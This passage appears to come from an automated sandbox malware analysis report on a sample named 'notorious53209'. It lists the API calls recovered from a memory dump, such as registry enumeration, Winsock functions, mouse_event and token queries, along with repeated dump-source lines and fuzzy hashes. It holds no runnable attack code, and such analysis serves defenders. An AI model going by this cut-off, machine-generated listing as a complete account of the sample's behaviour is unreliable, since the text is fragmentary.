                                              • Part of subcall function 00231D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00231D73
                                              • Part of subcall function 00231D35: GetStockObject.GDI32(00000011), ref: 00231D87
                                              • Part of subcall function 00231D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00231D91
                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002B78A1
                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002B78AE
                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002B78B9
                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002B78C8
                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002B78D4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$CreateObjectStockWindow
                                            • String ID: Msctls_Progress32
                                            • API String ID: 1025951953-3636473452
                                            • Opcode ID: 3feba8816469948a9348da69ce9ea2dac612ef8f95e6839b2b230b3e8361f042
                                            • Instruction ID: ce2569fb7b97748843d9cb986cc8b5c662fed1ee101096717853509adf1e18e5
                                            • Opcode Fuzzy Hash: 3feba8816469948a9348da69ce9ea2dac612ef8f95e6839b2b230b3e8361f042
                                            • Instruction Fuzzy Hash: CD11B6B216011ABFEF159F60CC85EE77F5DEF48798F014115FA04A20A0C771AC21DBA0
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 002541E3
                                            • GetProcAddress.KERNEL32(00000000), ref: 002541EA
                                            • RtlEncodePointer.NTDLL(00000000), ref: 002541F6
                                            • RtlDecodePointer.NTDLL(00000001), ref: 00254213
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                            • String ID: RoInitialize$combase.dll
                                            • API String ID: 3489934621-340411864
                                            • Opcode ID: 4b40cef33f086a8606dc156cd5e934ee40c9dc0666602c37bf366e708c17dbf9
                                            • Instruction ID: 8bbc208233a4393d369be5ba7b7d54fb5a27917a79ec0ca1141e2757a220af92
                                            • Opcode Fuzzy Hash: 4b40cef33f086a8606dc156cd5e934ee40c9dc0666602c37bf366e708c17dbf9
                                            • Instruction Fuzzy Hash: 28E092B05A0340AEDB503F70FC0CB2635A4B721747F008634B826D51A0DBF000E5CF10
                                            APIs
                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,002541B8), ref: 002542B8
                                            • GetProcAddress.KERNEL32(00000000), ref: 002542BF
                                            • RtlEncodePointer.NTDLL(00000000), ref: 002542CA
                                            • RtlDecodePointer.NTDLL(002541B8), ref: 002542E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                            • String ID: RoUninitialize$combase.dll
                                            • API String ID: 3489934621-2819208100
                                            • Opcode ID: ae9220cae948eb48e34fbe9107535f85dc5d432d2599c90958d333bba8acdfca
                                            • Instruction ID: 33559ca36683f63a50e42c9a3f042f5724084e7d701ed0efcda9099acfe26798
                                            • Opcode Fuzzy Hash: ae9220cae948eb48e34fbe9107535f85dc5d432d2599c90958d333bba8acdfca
                                            • Instruction Fuzzy Hash: 92E04F78560301EBDB40AF20FD0CB123AA4B720796F104238F415D11A0CBF054A4CB14
                                            APIs
                                            • __WSAFDIsSet.WS2_32(00000000,?), ref: 002A6F14
                                            • WSAGetLastError.WS2_32(00000000), ref: 002A6F48
                                            • htons.WS2_32(?), ref: 002A6FFE
                                            • inet_ntoa.WS2_32(?), ref: 002A6FBB
                                              • Part of subcall function 0028AE14: _strlen.LIBCMT ref: 0028AE1E
                                              • Part of subcall function 0028AE14: _memmove.LIBCMT ref: 0028AE40
                                            • _strlen.LIBCMT ref: 002A7058
                                            • _memmove.LIBCMT ref: 002A70C1
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                            • String ID:
                                            • API String ID: 3619996494-0
                                            • Opcode ID: ad0d8bb9a99a074f16ef5ad20950bee1d69c89a8db3d15d0496df957eafd8166
                                            • Instruction ID: 700a6636b3e964f7c8df47873489b58dac2efab1c5060cec6377fdca9b9e51ad
                                            • Opcode Fuzzy Hash: ad0d8bb9a99a074f16ef5ad20950bee1d69c89a8db3d15d0496df957eafd8166
                                            • Instruction Fuzzy Hash: 1E81EFB1128300AFD710EF24CC86F6BB3E9AF86714F144A19F5559B292DFB09D64CB92
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _memmove$__itow__swprintf
                                            • String ID:
                                            • API String ID: 3253778849-0
                                            • Opcode ID: 2d16bad4011c88efadf0a2ebd10c6b8f6b7cea301be424bbf4c5da4b2a776fd9
                                            • Instruction ID: de7b662d364a7373ef733e4450e8829588a4c696e9a509400b3c17ead90c62de
                                            • Opcode Fuzzy Hash: 2d16bad4011c88efadf0a2ebd10c6b8f6b7cea301be424bbf4c5da4b2a776fd9
                                            • Instruction Fuzzy Hash: DF61B97052025AABDF11EF20CC86FFE77A5AF05308F044519FC5A5B292DB70A869CF90
                                            APIs
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                              • Part of subcall function 002B10A5: CharUpperBuffW.USER32(?,?), ref: 002B10BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002B0548
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002B0588
                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002B05AB
                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002B05D4
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002B0617
                                            • RegCloseKey.ADVAPI32(00000000), ref: 002B0624
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                            • String ID:
                                            • API String ID: 4046560759-0
                                            • Opcode ID: 5d8b56a4f085de139fd89f737a41440e3110f6712029e49ae6ccc4cdc7840692
                                            • Instruction ID: 3527a07ec80d19eba37ae45aa1bfb1936ddd6219de55093c98bc509bbc004b5b
                                            • Opcode Fuzzy Hash: 5d8b56a4f085de139fd89f737a41440e3110f6712029e49ae6ccc4cdc7840692
                                            • Instruction Fuzzy Hash: BA515771128201AFCB15EF24C885EABBBE8FF89354F04491DF585872A1DB71E924CF52
                                            APIs
                                            • GetMenu.USER32(?), ref: 002B5A82
                                            • GetMenuItemCount.USER32(00000000), ref: 002B5AB9
                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002B5AE1
                                            • GetMenuItemID.USER32(?,?), ref: 002B5B50
                                            • GetSubMenu.USER32(?,?), ref: 002B5B5E
                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 002B5BAF
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Menu$Item$CountMessagePostString
                                            • String ID:
                                            • API String ID: 650687236-0
                                            • Opcode ID: fb026c1a53e7c0ba09af22bdbb0cd1b3f8a4259423ead261de7cc053fba4b02c
                                            • Instruction ID: cc060ffd4c15dc24a8227a5d8da7761d26c9a4affa18a1fdcdd12cfa16068812
                                            • Opcode Fuzzy Hash: fb026c1a53e7c0ba09af22bdbb0cd1b3f8a4259423ead261de7cc053fba4b02c
                                            • Instruction Fuzzy Hash: 34519C31A10626AFCF11EFA4C845AEEB7B4EF48360F104469ED16BB351CB70AE518F90
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 0028F3F7
                                            • VariantClear.OLEAUT32(00000013), ref: 0028F469
                                            • VariantClear.OLEAUT32(00000000), ref: 0028F4C4
                                            • _memmove.LIBCMT ref: 0028F4EE
                                            • VariantClear.OLEAUT32(?), ref: 0028F53B
                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0028F569
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                            • String ID:
                                            • API String ID: 1101466143-0
                                            • Opcode ID: 0646040ab3c322428a80c81c7b131d10c6a5bde6d80e0b8bbd9d903ae1913384
                                            • Instruction ID: 3e7ab44b32a7b4dfb4cdce008ca6c40a2ab2db2c640ebeee037739e373b2fc96
                                            • Opcode Fuzzy Hash: 0646040ab3c322428a80c81c7b131d10c6a5bde6d80e0b8bbd9d903ae1913384
                                            • Instruction Fuzzy Hash: 3B516CB9A10209EFCB10DF58D884AAAB7B8FF4C314B158569EE59DB341D734E911CFA0
                                            APIs
                                            • _memset.LIBCMT ref: 00292747
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00292792
                                            • IsMenu.USER32(00000000), ref: 002927B2
                                            • CreatePopupMenu.USER32 ref: 002927E6
                                            • GetMenuItemCount.USER32(000000FF), ref: 00292844
                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00292875
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                            • String ID:
                                            • API String ID: 3311875123-0
                                            • Opcode ID: da3ecf3b3de0266defa1e9695874b42fe108cfb389b003c6a722556000fd0c89
                                            • Instruction ID: b8740352de0cdbfee8675792db72d7039da099561493f7fea022f28fc7bb63c5
                                            • Opcode Fuzzy Hash: da3ecf3b3de0266defa1e9695874b42fe108cfb389b003c6a722556000fd0c89
                                            • Instruction Fuzzy Hash: 9751B370A10306FFDF24CF68D888BAEBBF5BF44314F104669E815AB291D7709968CB61
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • BeginPaint.USER32(?,?), ref: 0023179A
                                            • GetWindowRect.USER32(?,?), ref: 002317FE
                                            • ScreenToClient.USER32(?,?), ref: 0023181B
                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0023182C
                                            • EndPaint.USER32(?,?), ref: 00231876
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                            • String ID:
                                            • API String ID: 1827037458-0
                                            • Opcode ID: e2d9b2952a00c81875def7e099b93b9c6b23649d45a10bb4f3ec656eae8607d4
                                            • Instruction ID: a89636682ba0e48036d331501c5f4823bb09bd56b014b3808628047996f37f42
                                            • Opcode Fuzzy Hash: e2d9b2952a00c81875def7e099b93b9c6b23649d45a10bb4f3ec656eae8607d4
                                            • Instruction Fuzzy Hash: 7141CFB0120301AFD711DF28DC88FB67BF8EB49764F040628FAA4872A1C7319C69DB61
                                            APIs
                                            • ShowWindow.USER32(002F67B0,00000000), ref: 002BB9CC
                                            • EnableWindow.USER32(00000000,00000000), ref: 002BB9F0
                                            • ShowWindow.USER32(002F67B0,00000000), ref: 002BBA50
                                            • ShowWindow.USER32(00000000,00000004), ref: 002BBA62
                                            • EnableWindow.USER32(00000000,00000001), ref: 002BBA86
                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 002BBAA9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$Show$Enable$MessageSend
                                            • String ID:
                                            • API String ID: 642888154-0
                                            • Opcode ID: 3a22699ec1df95a332be46d4808003f456e06551a41835b536cc16feb436a614
                                            • Instruction ID: d610cd6fd50456c773852c27f238c9f8b22ee5094739111983bbcb59ea4f834e
                                            • Opcode Fuzzy Hash: 3a22699ec1df95a332be46d4808003f456e06551a41835b536cc16feb436a614
                                            • Instruction Fuzzy Hash: 10415030610642AFDB22CF14D999BD57BE0BF05350F1842B9EA588F2A2C7B1E855CF91
                                            APIs
                                            • GetForegroundWindow.USER32 ref: 002A73BF
                                              • Part of subcall function 002A3C94: GetWindowRect.USER32(?,?), ref: 002A3CA7
                                            • GetDesktopWindow.USER32 ref: 002A73E9
                                            • GetWindowRect.USER32(00000000), ref: 002A73F0
                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 002A7422
                                              • Part of subcall function 002954E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0029555E
                                            • GetCursorPos.USER32(?), ref: 002A744E
                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 002A74AC
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                            • String ID:
                                            • API String ID: 4137160315-0
                                            • Opcode ID: aa18da278fecc8c25115cb95f551c8c58d461cf24b102bbcebc2522287cd96ed
                                            • Instruction ID: 866b582de7eedf6aa11186fa4d2d6215128ea0dbd3bab9d6db65eb56a5d03469
                                            • Opcode Fuzzy Hash: aa18da278fecc8c25115cb95f551c8c58d461cf24b102bbcebc2522287cd96ed
                                            • Instruction Fuzzy Hash: 5931E672508316ABD720DF14EC49F9BBBE9FF89314F004929F98897191CB30E918CB92
                                            APIs
                                              • Part of subcall function 00239997: __itow.LIBCMT ref: 002399C2
                                              • Part of subcall function 00239997: __swprintf.LIBCMT ref: 00239A0C
                                              • Part of subcall function 0024FEC6: _wcscpy.LIBCMT ref: 0024FEE9
                                            • _wcstok.LIBCMT ref: 0029EEFF
                                            • _wcscpy.LIBCMT ref: 0029EF8E
                                            • _memset.LIBCMT ref: 0029EFC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                            • String ID: X
                                            • API String ID: 774024439-3081909835
                                            • Opcode ID: 653547d3c778f483bc838d9a99cc9f824f68151eab83d31a68e69b958d7f101d
                                            • Instruction ID: a0fadbcf4ba60518609dd65a2e0da207d9928741bb53ed8a97c553923a434d0d
                                            • Opcode Fuzzy Hash: 653547d3c778f483bc838d9a99cc9f824f68151eab83d31a68e69b958d7f101d
                                            • Instruction Fuzzy Hash: 6CC18FB15283019FCB64EF24C985A5AB7E4FF85310F04492DF899972A2DB70ED65CF82
                                            APIs
                                              • Part of subcall function 002885F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00288608
                                              • Part of subcall function 002885F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00288612
                                              • Part of subcall function 002885F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00288621
                                              • Part of subcall function 002885F1: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00288628
                                              • Part of subcall function 002885F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0028863E
                                            • GetLengthSid.ADVAPI32(?,00000000,00288977), ref: 00288DAC
                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00288DB8
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00288DBF
                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00288DD8
                                            • GetProcessHeap.KERNEL32(00000000,00000000,00288977), ref: 00288DEC
                                            • HeapFree.KERNEL32(00000000), ref: 00288DF3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
